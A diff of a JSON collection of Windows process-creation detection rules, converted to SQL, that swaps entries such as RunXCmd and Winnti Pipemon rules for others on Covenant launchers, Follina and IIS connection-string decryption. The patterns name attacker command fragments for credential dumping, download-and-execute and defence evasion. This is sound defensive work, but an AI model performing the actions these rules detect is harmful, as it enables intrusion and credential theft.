ghosting or other unorthodox methods to start a process)", - "author": "Max Altgelt (Nextron Systems)", + "title": "PUA - RunXCmd Execution", + "id": "93199800-b52a-4dec-b762-75212c196542", + "status": "test", + "description": "Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ - "Unknown" + "Legitimate use by administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NOT ((NewProcessName LIKE '%.exe' ESCAPE '\\' OR NewProcessName LIKE '%.tmp' ESCAPE '\\')) AND NOT ((NewProcessName = '') OR (NewProcessName IN ('System', 'Registry', 'MemCompression', 'vmmem')) OR (NewProcessName IN ('-', '')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\') OR ((ParentProcessName LIKE 'C:\\\\ProgramData\\\\Avira\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE '%.scr' ESCAPE '\\') OR (NewProcessName LIKE '%NVIDIA\\\\NvBackend\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%.dat' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%.com' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\WinSCP.com' ESCAPE '\\') OR (NewProcessName LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%.tmp%' ESCAPE '\\' AND NewProcessName LIKE '%CodeSetup%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\program\\\\soffice.bin' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\EMC NetWorker\\\\Management\\\\GST\\\\apache\\\\cgi-bin\\\\update\\_jnlp.cgi' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\EMC NetWorker\\\\Management\\\\GST\\\\apache\\\\cgi-bin\\\\update\\_jnlp.cgi' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\WINPAKPRO\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\WINPAKPRO\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%.ngn' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\MyQ\\\\Server\\\\pcltool.dll' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\MyQ\\\\Server\\\\pcltool.dll' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio%' ESCAPE '\\') AND NewProcessName LIKE '%.com' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Config.Msi\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%.rbf' ESCAPE '\\' OR NewProcessName LIKE '%.rbs' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Packages\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\LocalState\\\\rootfs\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\LZMA\\_EXE' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\Helper\\\\%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\TBT\\_Dock\\_Firmware\\\\GetDockVer32W.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\tobedeleted\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% /account=system %' ESCAPE '\\' OR CommandLine LIKE '% /account=ti %' ESCAPE '\\') AND CommandLine LIKE '%/exec=%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_non_exe_image.yml" + "filename": "proc_creation_win_pua_runxcmd.yml" }, { - "title": "Winnti Pipemon Characteristics", - "id": "73d70463-75c9-4258-92c6-17500fe972f2", - "status": "stable", - "description": "Detects specific process characteristics of Winnti Pipemon malware reported by ESET", - "author": "Florian Roth (Nextron Systems), oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.g0044" - ], + "title": "Suspicious Kernel Dump Using Dtrace", + "id": "7124aebe-4cd7-4ccb-8df0-6d6b93c96795", + "status": "test", + "description": "Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate setups that use similar flags" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%setup0.exe -p%' ESCAPE '\\' OR (CommandLine LIKE '%setup.exe%' ESCAPE '\\' AND (CommandLine LIKE '%-x:0' ESCAPE '\\' OR CommandLine LIKE '%-x:1' ESCAPE '\\' OR CommandLine LIKE '%-x:2' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\dtrace.exe' ESCAPE '\\' AND CommandLine LIKE '%lkd(0)%' ESCAPE '\\') OR (CommandLine LIKE '%syscall:::return%' ESCAPE '\\' AND CommandLine LIKE '%lkd(%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_winnti_pipemon.yml" + "filename": "proc_creation_win_dtrace_kernel_dump.yml" }, { - "title": "Potential Configuration And Service Reconnaissance Via Reg.EXE", - "id": "970007b7-ce32-49d0-a4a4-fbef016950bd", + "title": "Imports Registry Key From an ADS", + "id": "0b80ade5-6997-4b1d-99a1-71701778ea61", "status": "test", - "description": "Detects the usage of \"reg.exe\" in order to query reconnaissance information from the registry. Adversaries may interact with the Windows registry to gather information about credentials, the system, configuration, and installed software.", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects the import of a alternate datastream to the registry with regedit.exe.", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", "tags": [ - "attack.discovery", - "attack.t1012", - "attack.t1007" + "attack.t1112", + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '%query%' ESCAPE '\\' AND (CommandLine LIKE '%currentVersion\\\\windows%' ESCAPE '\\' OR CommandLine LIKE '%winlogon\\\\%' ESCAPE '\\' OR CommandLine LIKE '%currentVersion\\\\shellServiceObjectDelayLoad%' ESCAPE '\\' OR CommandLine LIKE '%currentVersion\\\\run%' ESCAPE '\\' OR CommandLine LIKE '%currentVersion\\\\policies\\\\explorer\\\\run%' ESCAPE '\\' OR CommandLine LIKE '%currentcontrolset\\\\services%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND ((CommandLine LIKE '% /i %' ESCAPE '\\' OR CommandLine LIKE '%.reg%' ESCAPE '\\') AND CommandLine REGEXP ':[^ \\\\]')) AND NOT ((CommandLine LIKE '% /e %' ESCAPE '\\' OR CommandLine LIKE '% /a %' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_reg_query_registry.yml" + "filename": "proc_creation_win_regedit_import_keys_ads.yml" }, { - "title": "Dllhost.EXE Execution Anomaly", - "id": "e7888eb1-13b0-4616-bd99-4bc0c2b054b9", - "status": "experimental", - "description": "Detects a \"dllhost\" process spawning with no commandline arguments which is very rare to happen and could indicate process injection activity or malware mimicking similar system processes.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential PowerShell Downgrade Attack", + "id": "b3512211-c67e-4707-bedc-66efc7848863", + "status": "test", + "description": "Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0", + "author": "Harish Segar (rule)", "tags": [ "attack.defense_evasion", - "attack.t1055" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%dllhost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' AND (CommandLine LIKE '% -version 2 %' ESCAPE '\\' OR CommandLine LIKE '% -versio 2 %' ESCAPE '\\' OR CommandLine LIKE '% -versi 2 %' ESCAPE '\\' OR CommandLine LIKE '% -vers 2 %' ESCAPE '\\' OR CommandLine LIKE '% -ver 2 %' ESCAPE '\\' OR CommandLine LIKE '% -ve 2 %' ESCAPE '\\' OR CommandLine LIKE '% -v 2 %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dllhost_no_cli_execution.yml" + "filename": "proc_creation_win_powershell_downgrade_attack.yml" }, { - "title": "Suspicious Rundll32 Invoking Inline VBScript", - "id": "1cc50f3f-1fc8-4acf-b2e9-6f172e1fdebd", + "title": "Suspicious Desktopimgdownldr Command", + "id": "bb58aa4a-b80b-415a-a2c0-2f65a4c81009", "status": "test", - "description": "Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452", + "description": "Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1055" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%Execute%' ESCAPE '\\' AND CommandLine LIKE '%RegRead%' ESCAPE '\\' AND CommandLine LIKE '%window.close%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '% /lockscreenurl:%' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\'))) OR (CommandLine LIKE '%reg delete%' ESCAPE '\\' AND CommandLine LIKE '%\\\\PersonalizationCSP%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_inline_vbs.yml" + "filename": "proc_creation_win_desktopimgdownldr_susp_execution.yml" }, { - "title": "Conhost.exe CommandLine Path Traversal", - "id": "ee5e119b-1f75-4b34-add8-3be976961e39", - "status": "experimental", - "description": "detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "TropicTrooper Campaign November 2018", + "id": "8c7090c3-e0a0-4944-bd08-08c3a0cecf79", + "status": "stable", + "description": "Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia", + "author": "@41thexplorer, Microsoft Defender ATP", "tags": [ "attack.execution", - "attack.t1059.003" - ], - "falsepositives": [ - "Unlikely" + "attack.t1059.001" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentCommandLine LIKE '%conhost%' ESCAPE '\\' AND CommandLine LIKE '%/../../%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc%' ESCAPE '\\')" ], - "filename": "proc_creation_win_conhost_path_traversal.yml" + "filename": "proc_creation_win_apt_tropictrooper.yml" }, { - "title": "Regedit as Trusted Installer", - "id": "883835a7-df45-43e4-bf1d-4268768afda4", - "status": "test", - "description": "Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe", - "author": "Florian Roth (Nextron Systems)", + "title": "VsCode Child Process Anomaly", + "id": "5a3164f2-b373-4152-93cf-090b13c12d27", + "status": "experimental", + "description": "Detects uncommon or suspicious child processes spawning from a VsCode \"code.exe\" process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1548" + "attack.execution", + "attack.defense_evasion", + "attack.t1218", + "attack.t1202" ], "falsepositives": [ - "Unlikely" + "In development environment where VsCode is used heavily. False positives may occur when developers use task to compile or execute different types of code. Remove or add processes accordingly" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\TrustedInstaller.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ProcessHacker.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\code.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-Expressions%' ESCAPE '\\' OR CommandLine LIKE '%IEX%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Command%' ESCAPE '\\' OR CommandLine LIKE '%ICM%' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\')) OR (NewProcessName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_regedit_trustedinstaller.yml" + "filename": "proc_creation_win_vscode_child_processes_anomalies.yml" }, { - "title": "LOLBAS Data Exfiltration by DataSvcUtil.exe", - "id": "e290b10b-1023-4452-a4a9-eb31a9013b3a", + "title": "PowerShell Script Run in AppData", + "id": "ac175779-025a-4f12-98b0-acdaeb77ea85", "status": "experimental", - "description": "Detects when a user performs data exfiltration by using DataSvcUtil.exe", - "author": "Ialle Teixeira @teixeira0xfffff, Austin Songer @austinsonger", + "description": "Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.exfiltration", - "attack.t1567" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "DataSvcUtil.exe being used may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "DataSvcUtil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + "Administrative scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%/in:%' ESCAPE '\\' OR CommandLine LIKE '%/out:%' ESCAPE '\\' OR CommandLine LIKE '%/uri:%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\DataSvcUtil.exe' ESCAPE '\\' OR OriginalFileName = 'DataSvcUtil.exe'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%powershell.exe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\powershell%' ESCAPE '\\' OR CommandLine LIKE '%\\\\pwsh%' ESCAPE '\\' OR CommandLine LIKE '%pwsh.exe%' ESCAPE '\\') AND CommandLine LIKE '%/c %' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Roaming\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml" + "filename": "proc_creation_win_powershell_susp_ps_appdata.yml" }, { - "title": "Operator Bloopers Cobalt Strike Commands", - "id": "647c7b9e-d784-4fda-b9a0-45c565a7b729", + "title": "Microsoft IIS Connection Strings Decryption", + "id": "97dbf6e2-e436-44d8-abee-4261b24d3e41", "status": "experimental", - "description": "Detects use of Cobalt Strike commands accidentally entered in the CMD shell", - "author": "_pete_0, TheDFIRReport", + "description": "Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.", + "author": "Tim Rauch", "tags": [ - "attack.execution", - "attack.t1059.003" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'Cmd.Exe' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND ((CommandLine LIKE 'cmd %' ESCAPE '\\' OR CommandLine LIKE 'cmd.exe%' ESCAPE '\\' OR CommandLine LIKE 'c:\\\\windows\\\\system32\\\\cmd.exe%' ESCAPE '\\') AND (CommandLine LIKE '%psinject%' ESCAPE '\\' OR CommandLine LIKE '%spawnas%' ESCAPE '\\' OR CommandLine LIKE '%make\\_token%' ESCAPE '\\' OR CommandLine LIKE '%remote-exec%' ESCAPE '\\' OR CommandLine LIKE '%rev2self%' ESCAPE '\\' OR CommandLine LIKE '%dcsync%' ESCAPE '\\' OR CommandLine LIKE '%logonpasswords%' ESCAPE '\\' OR CommandLine LIKE '%execute-assembly%' ESCAPE '\\' OR CommandLine LIKE '%getsystem%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\aspnet\\_regiis.exe' ESCAPE '\\' OR OriginalFileName LIKE 'aspnet\\_regiis.exe' ESCAPE '\\') AND (CommandLine LIKE '%connectionStrings%' ESCAPE '\\' AND CommandLine LIKE '% -pdf%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml" + "filename": "proc_creation_win_iis_connection_strings_decryption.yml" }, { - "title": "Raccine Uninstall", - "id": "a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc", - "status": "test", - "description": "Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool.", - "author": "Florian Roth (Nextron Systems)", + "title": "Renamed BrowserCore.EXE Execution", + "id": "8a4519e8-e64a-40b6-ae85-ba8ad2177559", + "status": "experimental", + "description": "Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens)", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.t1528", + "attack.t1036.003" ], "falsepositives": [ - "Legitimate deinstallation by administrative staff" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%taskkill %' ESCAPE '\\' AND CommandLine LIKE '%RaccineSettings.exe%' ESCAPE '\\') OR (CommandLine LIKE '%reg.exe%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%Raccine Tray%' ESCAPE '\\') OR (CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%/DELETE%' ESCAPE '\\' AND CommandLine LIKE '%Raccine Rules Updater%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'BrowserCore.exe' AND NOT ((NewProcessName LIKE '%\\\\BrowserCore.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_disable_raccine.yml" + "filename": "proc_creation_win_renamed_browsercore.yml" }, { - "title": "WmiPrvSE Spawned A Process", - "id": "d21374ff-f574-44a7-9998-4a8c8bf33d7d", - "status": "stable", - "description": "Detects wmiprvse spawning processes", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "WhoAmI as Parameter", + "id": "e9142d84-fbe0-401d-ac50-3e519fb00c89", + "status": "test", + "description": "Detects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1047" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\WmiPrvSe.exe' ESCAPE '\\' AND NOT ((SubjectLogonId IN ('0x3e7', 'null') OR (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\')) OR (SubjectLogonId = '')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%.exe whoami%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wmiprvse_spawning_process.yml" + "filename": "proc_creation_win_susp_whoami_as_param.yml" }, { - "title": "Potential Suspicious Child Process Of 3CXDesktopApp", - "id": "63f3605b-979f-48c2-b7cc-7f90523fed88", + "title": "Suspicious Serv-U Process Pattern", + "id": "58f4ea09-0fc2-4520-ba18-b85c540b0eaf", "status": "experimental", - "description": "Detects potential suspicious child processes of \"3CXDesktopApp.exe\". Which could be related to the 3CXDesktopApp supply chain compromise", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a suspicious process pattern which could be a sign of an exploited Serv-U service", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.execution", - "attack.t1218" + "attack.credential_access", + "attack.t1555", + "cve.2021.35211" ], "falsepositives": [ - "Unknown" + "Legitimate uses in which users or programs use the SSH service of Serv-U for remote command execution" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\3CXDesktopApp.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\Serv-U.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_3cx_compromise_susp_children.yml" + "filename": "proc_creation_win_servu_susp_child_process.yml" }, { - "title": "Modify Group Policy Settings", - "id": "ada4b0c4-758b-46ac-9033-9004613a150d", + "title": "Execute Pcwrun.EXE To Leverage Follina", + "id": "6004abd0-afa4-4557-ba90-49d172e0a299", "status": "experimental", - "description": "Detect malicious GPO modifications can be used to implement many other malicious behaviors.", - "author": "frack113", + "description": "Detects indirect command execution via Program Compatibility Assistant \"pcwrun.exe\" leveraging the follina (CVE-2022-30190) vulnerability", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1484.001" + "attack.t1218", + "attack.execution" ], "falsepositives": [ - "Legitimate use" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System%' ESCAPE '\\' AND (CommandLine LIKE '%GroupPolicyRefreshTimeDC%' ESCAPE '\\' OR CommandLine LIKE '%GroupPolicyRefreshTimeOffsetDC%' ESCAPE '\\' OR CommandLine LIKE '%GroupPolicyRefreshTime%' ESCAPE '\\' OR CommandLine LIKE '%GroupPolicyRefreshTimeOffset%' ESCAPE '\\' OR CommandLine LIKE '%EnableSmartScreen%' ESCAPE '\\' OR CommandLine LIKE '%ShellSmartScreenLevel%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\pcwrun.exe' ESCAPE '\\' AND CommandLine LIKE '%../%' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_modify_group_policy_settings.yml" + "filename": "proc_creation_win_lolbin_pcwrun_follina.yml" }, { - "title": "Run PowerShell Script from Redirected Input Stream", - "id": "c83bf4b5-cdf0-437c-90fa-43d734f7c476", + "title": "Start Windows Service Via Net.EXE", + "id": "2a072a96-a086-49fa-bcb5-15cc5a619093", "status": "test", - "description": "Detects PowerShell script execution via input stream redirect", - "author": "Moriarty Meng (idea), Anton Kutepov (rule), oscd.community", + "description": "Detects the usage of the \"net.exe\" command to start a service using the \"start\" flag", + "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.defense_evasion", "attack.execution", - "attack.t1059" + "attack.t1569.002" ], "falsepositives": [ - "Unknown" + "Legitimate administrator or user executes a service for legitimate reasons." ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '\\s-\\s*<')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND CommandLine LIKE '% start %' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_run_script_from_input_stream.yml" + "filename": "proc_creation_win_net_start_service.yml" }, { - "title": "AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl", - "id": "074e0ded-6ced-4ebd-8b4d-53f55908119d", + "title": "HackTool - Covenant PowerShell Launcher", + "id": "c260b6db-48ba-4b4a-a76f-2f67644e99d2", "status": "test", - "description": "Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)", - "author": "Julia Fomina, oscd.community", + "description": "Detects suspicious command lines used in Covenant luanchers", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1216" - ], - "falsepositives": [ - "Unlikely" + "attack.t1059.001", + "attack.t1564.003" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%winrm%' ESCAPE '\\' AND 